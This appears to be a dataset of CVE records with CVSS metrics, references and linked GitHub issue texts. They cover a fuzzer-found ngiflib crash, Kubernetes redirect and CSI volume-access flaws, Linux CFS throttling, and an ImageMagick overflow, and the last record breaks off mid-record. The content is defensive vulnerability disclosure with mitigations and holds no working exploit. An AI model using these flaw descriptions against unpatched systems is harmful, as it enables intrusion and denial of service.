[ "miniupnp", "ngiflib" ]
We found Segmentation Fault issue in gif2tga binary and gif2tga is complied with clang enabling ASAN. **Machine Setup** Machine : Ubuntu 16.04.3 LTS gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.11) Commit : 992d272 Command : ./gif2tga $POC POC :- [GifIndexToTrueColor-SEGV.zip](https://github.com/miniupnp/ngiflib/files/3790545/GifIndexToTrueColor-SEGV.zip) **ASAN Output** ``` fuzzer@thickfuzzer:~/fuzzer/ngiflib$ ./gif2tga in/GifIndexToTrueColor-SEGV ASAN:DEADLYSIGNAL ================================================================= ==11610==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005 (pc 0x0000004f2268 bp 0x7ffe389c63f0 sp 0x7ffe389c1d20 T0) #0 0x4f2267 in GifIndexToTrueColor /home/fuzzer/fuzzer/ngiflib/ngiflib.c:844:20 #1 0x4f2267 in WritePixel /home/fuzzer/fuzzer/ngiflib/ngiflib.c:134 #2 0x4f2267 in DecodeGifImg /home/fuzzer/fuzzer/ngiflib/ngiflib.c:560 #3 0x4f2267 in LoadGif /home/fuzzer/fuzzer/ngiflib/ngiflib.c:825 #4 0x4ea8a6 in main /home/fuzzer/fuzzer/ngiflib/gif2tga.c:95:10 #5 0x7f2b1146c82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #6 0x418a98 in _start (/home/fuzzer/fuzzer/ngiflib/gif2tga+0x418a98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/fuzzer/ngiflib/ngiflib.c:844:20 in GifIndexToTrueColor ==11610==ABORTING fuzzer@thickfuzzer:~/fuzzer/ngiflib$ ```
Segmentation Fault in ngiflib.c
https://api.github.com/repos/miniupnp/ngiflib/issues/16/comments
0
2019-10-30T18:20:15Z
2019-11-09T13:10:39Z
https://github.com/miniupnp/ngiflib/issues/16
514,884,667
16
CVE-2018-1002102
2019-12-05T16:15:10.427
Improper validation of URL redirection in the Kubernetes API server in versions prior to v1.14.0 allows an attacker-controlled Kubelet to redirect API server requests from streaming endpoints to arbitrary hosts. Impacted API servers will follow the redirect as a GET request with client-certificate credentials for authenticating to the Kubelet.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.6, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.6, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/85867" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q56CULSH7F7BC4NPS67ZS23ZCLL5TIVK/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "1774C3E1-5BE8-4DC0-8A61-39B183C36F96", "versionEndExcluding": null, "versionEndIncluding": "1.13.13", "versionStartExcluding": null, "versionStartIncluding": "1.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.14.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "34A6AC2D-82C4-4E1F-8D9A-159E31A4F790", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.14.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "002991E8-6CC8-4F58-89B3-0B1AF2447DD5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/85867
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F) An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet. ### Am I vulnerable? Kubernetes API servers with the `StreamingProxyRedirects` [feature](https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/) enabled AND without the `ValidateProxyRedirects` feature are affected. API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected. Using the default feature gate values, kube-apiserver versions before v1.14 are affected. ### How do I mitigate this vulnerability? For Kubernetes versions >= v1.10.0, the `ValidateProxyRedirects` can be manually enabled with the `kube-apiserver` flag `--feature-gates=ValidateProxyRedirects=true`. #### Fix impact The `ValidateProxyRedirects` feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag `--redirect-container-streaming=true`), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting `--redirect-container-streaming=false` on the kubelet to avoid issues. #### Fixed Versions - Kubernetes v1.14+ - Fixed by default in https://github.com/kubernetes/kubernetes/pull/72552 - Kubernetes v1.10-v1.14 - Fix available as alpha in https://github.com/kubernetes/kubernetes/pull/66516 ## Additional Details In a future release, we plan to deprecate the `StreamingProxyRedirects` feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). #### Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product-security /sig api-machinery node /area apiserver /close
CVE-2018-1002102: Unvalidated redirect
https://api.github.com/repos/kubernetes/kubernetes/issues/85867/comments
3
2019-12-03T22:58:37Z
2021-12-02T22:56:35Z
https://github.com/kubernetes/kubernetes/issues/85867
532,323,568
85,867
CVE-2019-11255
2019-12-05T16:15:10.567
Improper input validation in Kubernetes CSI sidecar containers for external-provisioner (<v0.4.3, <v1.0.2, v1.1, <v1.2.2, <v1.3.1), external-snapshotter (<v0.4.2, <v1.0.2, v1.1, <1.2.2), and external-resizer (v0.1, v0.2) could result in unauthorized PersistentVolume data access or volume mutation during snapshot, restore from snapshot, cloning and resizing operations.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.5, "impactScore": 4.2, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4054" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4096" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4099" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4225" }, { "source": "[email protected]", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/85233" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/aXiYN0q4uIw" }, { "source": "[email protected]", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20200810-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:external-provisioner:*:*:*:*:*:*:*:*", "matchCriteriaId": "9A78A50B-5286-400D-A54A-49F1023D97D6", "versionEndExcluding": null, "versionEndIncluding": "0.4.2", "versionStartExcluding": null, "versionStartIncluding": "0.4.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-provisioner:*:*:*:*:*:*:*:*", "matchCriteriaId": "A5CDEBDE-A093-4D75-A289-7F8D8F47C163", "versionEndExcluding": null, "versionEndIncluding": "1.0.1", "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-provisioner:*:*:*:*:*:*:*:*", "matchCriteriaId": "8CD30FBE-792A-42E3-9FAA-3122EBBEFC4C", "versionEndExcluding": null, "versionEndIncluding": "1.2.1", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-provisioner:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "686C1D64-DB77-451E-A3EC-9A415F7EAA2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-resizer:*:*:*:*:*:*:*:*", "matchCriteriaId": "920BC20F-8C59-4A34-AA0C-EBFD469C59C3", "versionEndExcluding": null, "versionEndIncluding": "0.2.0", "versionStartExcluding": null, "versionStartIncluding": "0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-snapshotter:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2DDFBDD-3AA1-40E4-B349-90D40C6E70F9", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "versionStartExcluding": null, "versionStartIncluding": "0.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-snapshotter:*:*:*:*:*:*:*:*", "matchCriteriaId": "F14DDAA3-4DD3-43D9-B934-4856C9A6B138", "versionEndExcluding": null, "versionEndIncluding": "1.0.1", "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:external-snapshotter:*:*:*:*:*:*:*:*", "matchCriteriaId": "0279E824-AF71-4EA1-8F41-3FAF256DC6EC", "versionEndExcluding": null, "versionEndIncluding": "1.2.1", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "4C85A84D-A70F-4B02-9E5D-CD9660ABF048", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/85233
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
<!-- Please use this template while reporting a bug and provide as much info as possible. Not doing so may result in your bug not being addressed in a timely manner. Thanks! If the matter is security related, please disclose it privately via https://kubernetes.io/security/ --> **Am I vulnerable?** CSI snapshot, cloning and resizing features are affected. Prior to Kubernetes 1.16, these features were all alpha and disabled by default. Starting in Kubernetes 1.16, CSI cloning and resizing features are beta and enabled by default. These features also require CSI drivers to be installed in a Kubernetes cluster and the CSI driver also has to support those features. An unofficial list of CSI drivers and their supported features is available [here](https://kubernetes-csi.github.io/docs/drivers.html), however it is best to check with the CSI driver vendor for the latest information. Check if you have the following Kubernetes feature gates enabled: ``` VolumeSnapshotDataSource: alpha starting with K8s 1.12 ExpandCSIVolumes: alpha starting with K8s 1.14, beta starting with K8s 1.16 VolumePVCDataSource: alpha starting with K8s 1.15, beta starting with K8s 1.16 ``` Check if you are using CSI drivers in your cluster. If so, the following command’s output will be non-empty: ``` $ kubectl get nodes -o jsonpath='{.items[*].metadata.annotations.csi\.volume\.kubernetes\.io\/nodeid}' {"my-csi-plugin":"kubernetes-minion-group-433q"} ``` Then, check the CSI driver’s pod specifications to see if they are using the following vulnerable versions of sidecars: ``` external-provisioner: v0.4.1-0.4.2, v1.0.0-1.0.1, v1.1.0-1.2.1, v1.3.0 external-snapshotter: v0.4.0-0.4.1, v1.0.0-1.0.1, v1.1.0-v1.2.1 external-resizer: v0.1.0-0.2.0 ``` An example query: ``` $ kubectl get pods --all-namespaces -o jsonpath='{..image}' | tr ' ' $'\n' | grep "csi-provisioner\|csi-snapshotter\|csi-resizer" image: quay.io/k8scsi/csi-provisioner:v1.2.0 ``` Note that the exact container image name may vary across CSI driver vendors. It is recommended to inspect the Pod specifications directly. **How do I mitigate the vulnerability?** As a short term mitigation, disable the `VolumeSnapshotDataSource`, `ExpandCSIVolumes`, and `VolumePVCDataSource` Kubernetes feature gates in kube-apiserver and kube-controller-manager. This will cause new PersistentVolumeClaims to be provisioned ignoring the DataSource and resizing requests will also be ignored. Note that this will cause new PVCs that are intended to be provisioned from a snapshot or clone to instead provision a blank disk. Also, to disable taking volume snapshots, either remove the external-snapshotter sidecar from any CSI drivers or revoke the CSI driver’s RBAC permissions on the `snapshot.storage.k8s.io` API group. Longer term, upgrade your CSI driver with patched versions of the affected sidecars. Fixes are available in the following sidecar versions: external-provisioner: v0.4.3 v1.0.2 v1.2.2 v1.3.1 v1.4.0 external-snapshotter: v0.4.2 v1.0.2 v1.2.2 external-resizer v0.3.0 Fixes for each of the sidecars can be tracked by: https://github.com/kubernetes-csi/external-provisioner/issues/380 https://github.com/kubernetes-csi/external-snapshotter/issues/193 https://github.com/kubernetes-csi/external-resizer/issues/63 **How do I upgrade?** Check with your CSI driver vendor for upgrade instructions. No Kubernetes control plane or node upgrades are required unless the CSI driver is bundled into the Kubernetes distribution. **Vulnerability details** There are two different vulnerabilities impacting the same features. When PersistentVolumeClaim and PersistentVolume objects are bound, they have bidirectional references to each other. When dereferencing a PersistentVolumeClaim to get a PersistentVolume, the impacted sidecar controllers were not validating that the PersistentVolume referenced back to the same PersistentVolumeClaim, potentially operating on unauthorized PersistentVolumes for snapshot, cloning and resizing operations. A similar issue exists for VolumeSnapshot and VolumeSnapshotContent objects when creating a new PersistentVolumeClaim from a snapshot. The second issue is related to the property that CSI volume and snapshot ids are only required to be unique within a single CSI driver. Impacted sidecar controllers were not validating that the requested source VolumeSnapshot or PersistentVolumeClaim specified were from the same driver processing the request, potentially operating on unauthorized volumes during snapshot, restore from snapshot, or cloning operations.
CVE-2019-11255: CSI volume snapshot, cloning and resizing features can result in unauthorized volume data access or mutation
https://api.github.com/repos/kubernetes/kubernetes/issues/85233/comments
5
2019-11-13T20:57:31Z
2022-10-14T02:00:55Z
https://github.com/kubernetes/kubernetes/issues/85233
522,468,661
85,233
CVE-2019-19922
2019-12-22T20:15:10.823
kernel/sched/fair.c in the Linux kernel before 5.3.9, when cpu.cfs_quota_us is used (e.g., with Kubernetes), allows attackers to cause a denial of service against non-cpu-bound applications by generating a workload that triggers unwanted slice expiration, aka CID-de53fd7aedb1. (In other words, although this slice expiration would typically be seen with benign workloads, it is possible that an attacker could calculate how many stray requests are required to force an entire Kubernetes cluster into a low-performance state caused by slice expiration, and ensure that a DDoS attack sent that number of stray requests. An attack does not affect the stability of the kernel; it only causes mismanagement of application execution.)
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Vendor Advisory" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.3.9" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Vendor Advisory" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=de53fd7aedb100f03e5d2231cfce0e4993282425" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/67577" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/torvalds/linux/commit/de53fd7aedb100f03e5d2231cfce0e4993282425" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://relistan.com/the-kernel-may-be-slowing-down-your-app" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200204-0002/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4226-1/" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "72AC7518-B872-42E3-A43B-F2D010211A8D", "versionEndExcluding": "5.3.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "78C99571-0F3C-43E6-84B3-7D80E045EF8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C2089EE-5D7F-47EC-8EA5-0F69790564C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*", "matchCriteriaId": "0EF46487-B64A-454E-AECC-D74B83170ACD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:e-series_santricity_os_controller:*:*:*:*:*:*:*:*", "matchCriteriaId": "A0DA944C-4992-424D-BC82-474585DAC5DF", "versionEndExcluding": null, "versionEndIncluding": "11.70.2", "versionStartExcluding": null, "versionStartIncluding": "11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*", "matchCriteriaId": "66EEA3CA-8CC7-4F0B-8204-6132D4114873", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*", "matchCriteriaId": "DE7C6010-F736-4BDA-9E3B-C4370BBFA149", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6D700C5-F67F-4FFB-BE69-D524592A3D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:h:netapp:aff_baseboard_management_controller:a700:*:*:*:*:*:*:*", "matchCriteriaId": "49E3F452-73D7-465E-BC76-5B0DA75240A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*", "matchCriteriaId": "090AA6F4-4404-4E26-82AB-C3A22636F276", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/67577
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
> /kind bug This is not a bug in Kubernets per se, it's more of a heads-up. I've read this great blog post: * https://kubernetes.io/blog/2018/07/24/feature-highlight-cpu-manager/ From the blog post I learned that k8s is using cfs quotas to enforce CPU limits. Unfortunately, those can lead to unnecessary throttling, especially for well behaved tenants. See this unresolved bug in Linux kernel I filed a while back: * https://bugzilla.kernel.org/show_bug.cgi?id=198197 There's an open and stalled patch that addresses the issue (I've not verified if it works): * https://lore.kernel.org/patchwork/cover/907448/ cc @ConnorDoyle @balajismaniam
CFS quotas can lead to unnecessary throttling
https://api.github.com/repos/kubernetes/kubernetes/issues/67577/comments
146
2018-08-20T04:06:20Z
2023-01-16T14:53:22Z
https://github.com/kubernetes/kubernetes/issues/67577
351,978,078
67,577
CVE-2019-19948
2019-12-24T01:15:11.247
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00006.html" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1562" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00033.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4549-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*", "matchCriteriaId": "2EDF50C4-9FFE-4EBF-A5BE-44AF7E6988D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", 